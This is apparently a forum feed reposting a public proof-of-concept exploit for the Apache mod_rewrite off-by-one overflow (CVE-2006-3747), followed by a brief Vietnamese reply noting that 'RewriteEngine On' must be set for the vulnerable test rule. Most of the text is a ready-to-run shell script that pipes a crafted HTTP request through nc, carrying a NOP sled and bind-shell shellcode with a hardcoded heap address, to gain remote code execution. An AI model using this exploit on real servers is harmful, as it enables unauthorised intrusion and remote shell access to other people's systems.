<![CDATA[Latest posts for the topic "Apache (mod_rewrite) Remote Overflow PoC"]]> /hvaonline/posts/list/13.html JForum - http://www.jforum.net Apache (mod_rewrite) Remote Overflow PoC _http://milw0rm.com/exploits/2237 #!/bin/sh # To know if your apache vulnerable version could be successful # exploited, write this rule in your httpd.conf or .htaccess file: # RewriteRule kung/(.*) $1 # And try to access to the following URL: # /kung/ldap://localhost/AAAAAAAAAAAAAAAAAAAAA%3FAAAAAAAAAAAAA%3FAAAAAAAAAAAAAAA%3FAAAAAAAAAA%3FAAAAAAAAAA%3FBBBBBBBBBBBBBB # If your web server doesn't reply you with a '302 Found' page or a # Segmentation Fault appears in your error_log, an apache child has # crashed and your web server is vulnerable and exploitable. # Exploit for Apache mod_rewrite off-by-one. # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # # Thx to xuso for help me with the shellcode. # # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified # for avoiding apache url-escape.. Take a look is quite nice ;) # # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at # 0x0834ae77 for any other version/system find it. # # Gulcas rulez :P Code:
echo -e "mod_rewrite apache off-by-one overflow\nby jack <jack\x40gulcas\x2eorg>\n\n"

if [ $# -ne 1 ] ; then
 echo "Usage: $0 webserver"
 exit
fi

host=$1

echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6%31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3%01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04%31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66%b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31%c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8%23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76%08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db%cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\nHost:$host\r\n\r\n" | nc $host 80
]]> /hvaonline/posts/list/3031.html#16943 /hvaonline/posts/list/3031.html#16943 GMT Apache (mod_rewrite) Remote Overflow PoC # To know if your apache vulnerable version could be successful # exploited, write this rule in your httpd.conf or .htaccess file: # RewriteRule kung/(.*) $1   Nên thêm vào là:
# RewriteEngine On # # RewriteRule kung/(.*) $1  
thì nó mới tác dụng.]]> /hvaonline/posts/list/3031.html#20561 /hvaonline/posts/list/3031.html#20561 GMT